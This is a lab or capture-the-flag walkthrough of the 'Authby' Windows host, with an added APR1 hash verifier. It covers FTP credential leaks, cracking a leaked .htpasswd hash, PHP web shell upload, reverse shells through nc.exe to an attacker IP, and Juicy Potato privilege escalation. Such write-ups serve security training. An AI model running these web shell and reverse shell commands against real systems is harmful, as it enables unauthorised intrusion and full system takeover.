# Authby

## Service Enumeration

`nmapAutomator.sh -H 192.168.85.46 -t full`

`nmapAutomator.sh -H 192.168.85.46 -t vulns`

### FTP

Anonymous login allowed.

![](/files/-MadXfNcM9v7WmlLncKg)

While we cannot access these files, we can see that there are some account names.

![](/files/-MadXiE_cH4Li2XQWSSl)

Using the account `admin:admin`, we get access to some other files.

![](/files/-MadXmeh055WyDtgQUnN)

The `.htaccess` and `.htpasswd` files are leaked.

![](/files/-MadXw2upjOEf_Z26MPL)

`.htaccess`

```
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
```

`.htpasswd`

```
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```

Passing the `.htpasswd` hash into John the Ripper, we find the credentials to authenticate into the HTTP server.

![](/files/-MadXzhzgm-OzVSjrsnf)

![](/files/-MadY0kOS_jF1p3jw5h6)
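Apache checks a Basic-auth password by recomputing the `$apr1$` hash (salted MD5 with 1000 stretching rounds) and comparing it with the stored string, so whoever holds the leaked file can test candidates offline at the cost of a few thousand MD5 calls each; that cheapness is why the John step succeeds so quickly, why `.htpasswd` must never be readable over FTP or HTTP, and why bcrypt entries (`htpasswd -B`) are preferred. The verifier below is an added example, not code from the writeup: it reimplements the documented APR1 scheme in pure Python and checks the leaked entry above against the recovered password.

```python
import hashlib
import hmac

# Leaked .htpasswd entry from the page; the writeup cracks it to "elite".
LEAKED_ENTRY = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0"

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value: int, count: int) -> str:
    """Apache's base-64 variant: `count` chars, low 6 bits first."""
    out = ""
    for _ in range(count):
        out += _ITOA64[value & 0x3F]
        value >>= 6
    return out

def apr1_md5(password: str, salt: str) -> str:
    """APR1 (Apache MD5-crypt): salted MD5 with 1000 stretching rounds."""
    pw, sl = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + b"$apr1$" + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for pl in range(len(pw), 0, -16):  # one alt-digest slice per 16 pw bytes
        ctx.update(alt[:min(16, pl)])
    i = len(pw)
    while i:  # per-bit quirk of the original: a NUL or the first pw byte
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):  # key stretching; mixing order varies by round
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(sl)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    f = final  # digest bytes are interleaved before encoding
    enc = "".join(_to64((f[a] << 16) | (f[b] << 8) | f[c], 4) for a, b, c in
                  ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return f"$apr1${sl.decode()}${enc}{_to64(f[11], 2)}"

def verify_htpasswd_entry(entry: str, candidate: str) -> bool:
    """Check a `user:$apr1$salt$hash` line the way Apache Basic auth does."""
    stored = entry.split(":", 1)[1]
    tag, salt, _digest = stored.lstrip("$").split("$")
    if tag != "apr1":
        raise ValueError("not an APR1 entry")
    return hmac.compare_digest(apr1_md5(candidate, salt), stored)
```

`verify_htpasswd_entry(LEAKED_ENTRY, "elite")` returns `True`; the same function applied to a bcrypt (`$2y$`) entry raises, which is the scheme you want to see in a file that might leak.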

### RDP

![](/files/-MadY3fQsfHGm3NbFZiG)

### Nonstandard Ports

![](/files/-MadY76Jsst-jzhbW-4U)

### HTTP

![](/files/-MadYBjXpH_GzQksHxDb)

Using the previously found credentials (`offsec:elite`), we can authenticate into the application.

![](/files/-MadYFL5F3_KnoNUydZ7)

### Subdirectory Enumeration

`gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite`

![](/files/-MadYIzqbbtUSKYFOTm7)

`gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401`

## Exploitation

Using the PHP backdoor from `/usr/share/webshells/php/simple-backdoor.php`, we can upload it through the `admin` FTP account to the web root. Then, we visit `simple-backdoor.php` and pass commands through the `cmd=` parameter to achieve RCE.

![](/files/-MadZtESeN0hNTXrq5gB)

Copy `nc.exe` through SMB:

`http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .`

Trigger a reverse shell:

`http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443`

On our listening machine, we get a reverse shell.

![](/files/-Mad_5-p9W7ZZtrXbi2u)

![](/files/-Mad_8-VgsTflDIu_1zS)

## Privilege Escalation

First, we know that `SeImpersonatePrivilege` is enabled.

![](/files/-Mad_AlRF_tTDNqCeRV1)

We can perform privilege escalation using Juicy Potato.

However, there are two challenges.

1. This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here: <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>
2. The default CLSID doesn't work. Juicy Potato will return `COM -> recv failed with error: 10038`.

`systeminfo` shows that this is Windows Server 2008.

![](/files/-Mad_NN84nAChOzHlVg9)

We can use one of the BITS CLSIDs from here: <https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise>. I used `{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`.

![](/files/-Mad_RHKJA_M64fZuiRq)

Now, we can use the `nc.exe` we transferred previously to get another reverse shell, this time with SYSTEM privileges.

`juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`

![](/files/-Mad_U7eBddgurKeckVj)

On our listening machine:

![](/files/-Mad_X7gDy37I3DdV4_l)

![](/files/-Mad__CyRLbFxkMgBRVt)
